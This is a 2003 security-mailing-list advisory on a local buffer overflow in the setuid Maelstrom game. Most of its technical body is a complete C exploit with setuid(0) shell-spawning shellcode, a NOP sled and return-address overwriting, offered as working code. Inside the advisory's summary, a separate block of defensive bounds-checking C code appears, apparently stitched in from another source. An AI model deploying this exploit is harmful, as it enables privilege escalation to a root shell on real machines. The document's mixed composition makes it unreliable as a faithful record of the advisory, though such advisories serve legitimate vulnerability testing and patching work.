[EXPL] Maelstrom Vulnerable to a Local Buffer Overflow (Another Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/31/03

    To: list@securiteam.com
    Date: 31 May 2003 11:34:00 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Maelstrom Vulnerable to a Local Buffer Overflow (Another Exploit)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in our previous article
    <http://www.securiteam.com/unixfocus/5OP0I2AA0S.html> (Maelstrom Vulnerable
    to a Local Buffer Overflow), there is a buffer overflow vulnerability in
    Maelstrom which allows a local attacker to execute arbitrary code.
    Exploitation of the vulnerability allows users to gain elevated
    privileges (the program is installed setuid 'games'). The following exploit
    code can be used to test your system for the vulnerability.
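    The bug class above (an over-long command-line argument copied into a
    fixed-size stack buffer inside a set-id program) is what a fix has to
    remove. The following is an added illustration, not Maelstrom's source
    and not the advisory's code: it shows the bounds-checked argument
    handling that closes this kind of hole, plus the stat() check an
    administrator uses to confirm whether an installed binary actually
    carries set-uid/set-gid bits. The option name "-server", the buffer
    size SERVER_ARG_MAX and the function names are assumptions made for
    the example.

```c
/* Added example (not Maelstrom's code): defensive handling of argv[] in a
 * set-uid/set-gid program. Every value below is a constructed assumption. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Hypothetical size of the fixed buffer that receives the "-server" value. */
#define SERVER_ARG_MAX 64

/* Copy src into dst (dstlen bytes) only if it fits together with its NUL.
 * Returns 0 on success; returns -1 and leaves dst empty if the argument is
 * too long. This is the replacement for an unchecked strcpy()/sprintf()
 * into a stack buffer, which is what lets an argument overwrite the
 * saved return address. */
int bounded_copy(char *dst, size_t dstlen, const char *src)
{
    size_t n;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Measure src without reading more than dstlen bytes of it. */
    for (n = 0; n < dstlen && src[n] != '\0'; n++)
        ;
    if (n >= dstlen)           /* no room for the terminating NUL: reject */
        return -1;

    memcpy(dst, src, n + 1);   /* n characters plus the NUL */
    return 0;
}

/* Locate a hypothetical "-server <name>" option and copy <name> into name[]
 * with the bounds check. Returns 0 when the option is absent or accepted,
 * -1 when it is present but missing its value or too long. */
int parse_server_arg(int argc, char **argv, char *name, size_t namelen)
{
    int i;

    name[0] = '\0';
    for (i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-server") == 0) {
            if (i + 1 >= argc)
                return -1;
            return bounded_copy(name, namelen, argv[i + 1]);
        }
    }
    return 0;
}

/* Return the set-id bits (S_ISUID | S_ISGID) present in the mode of path,
 * or 0 when none are set or the path cannot be stat()ed. This is the audit
 * check for "is this game binary really running with extra privilege?". */
int setid_bits(const char *path)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return 0;
    return (int)(st.st_mode & (S_ISUID | S_ISGID));
}

int main(int argc, char **argv)
{
    char name[SERVER_ARG_MAX];

    if (parse_server_arg(argc, argv, name, sizeof name) != 0) {
        fprintf(stderr, "-server value missing or longer than %d bytes\n",
                SERVER_ARG_MAX - 1);
        return 1;
    }
    if (setid_bits(argv[0]) != 0)
        fprintf(stderr, "note: %s carries set-uid/set-gid bits\n", argv[0]);
    printf("server name: '%s'\n", name);
    return 0;
}
```

    Running the binary with a value longer than SERVER_ARG_MAX - 1 bytes
    makes it exit with an error instead of touching memory past the buffer;
    that rejection, not the size of the buffer, is the fix. The setid_bits()
    check is the same test as `ls -l` showing an `s` in the mode, expressed
    so a script can act on it.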

    DETAILS

    Exploit:
    /** Maelstrom Local Exploit
     ** By: Dvdman@l33tsecurity.com
     ** Greetz: Sam,flatline,democow,#!l33tsecurity@efnet
     ** NOTES: I was inspired to write this because none of the others posted
     ** to packetstorm worked.
     ** The authors who wrote the exploit obviously didn't know how to build a
     ** buffer and were corrupting the return address.
     **
     ** SIDE NOTES: * /usr/bin/Maelstrom local exploit coded by c0wboy (c)
     ** 0x333 Outsiders Security Labs / www.0x333.org
     ** Basically a buffer overflow example code ripped and changed. Here is
     ** output from it. I doubt they even tested it.
        Program received signal SIGTRAP, Trace/breakpoint trap.
         0x40001e60 in _start () at rtld.c:158
             158 rtld.c: No such file or directory.
            in rtld.c
          (gdb) c
          Continuing.
          Couldn't resolve host name for 3¿Åÿÿ¿
           Program received signal SIGSEGV, Segmentation fault.
           0xfffac8bf in ?? ()

           You May Ask WHY?

        They built the buffer, or tried to at least, and added to the very end,
    screwing up the alignment.
        out[0] = '3';
        out[1] = '@';
        out[2] = '3';

    Then I saw maelst0x00.c.gz 1289 May 23 02:13:18 2003
    bfd34d743e37c8ee7b7f8490438cadb2
    Again doesn't do ***. I won't go into this one here.

    Then I saw one by akaccess. It seems to work; it's a nice beginning, at
    least he didn't rip his perl code =)
    but the player overflow is the same as the server overflow so blah. But
    at least his works.

    ********* HAVE FUN WITH THIS WORKING EXPLOIT THAT DOESN'T DO JACK ***
    *********************************

     **
     **/

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>   /* bzero() */
    #include <unistd.h>
    #include <getopt.h>
    #include <sys/errno.h>

    #define FUN "./Maelstrom"

    char shellcode[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

        /* SETUID(0) SHELLCODE LINUX */
        "\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc"
        "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
        "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
        "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

    int main(int argc, char **argv) {
        int eip[4];
        int i,x,b;
        long ret;
        char buffer[40000];
        char buffer2[100];
        char *env[2];
        char *args[4];

        ret = 0xbffffffa - strlen(shellcode) - strlen(FUN);
        if (argc > 1) ret = ret + atoi(argv[1]);

        /* put in env */
        env[0] = shellcode;
        env[1] = NULL;

        eip[0] = (ret & 0x000000ff);
        eip[1] = (ret & 0x0000ff00) >> 8;
        eip[2] = (ret & 0x00ff0000) >> 16;
        eip[3] = (ret & 0xff000000) >> 24;

        bzero (buffer, sizeof (buffer));
        buffer[0] = '3';
        buffer[1] = '@';
        buffer[2] = '1';

        for(i = 3, b = 0; i < 9001; i++, b++) {
            if(b == 4) b = 0;
            buffer[i] = (char)eip[b];
        }
        execle (FUN, FUN, "-server", buffer,NULL,env);
        return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dvdman@l33tsec.no-ip.org>
    dvdman.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
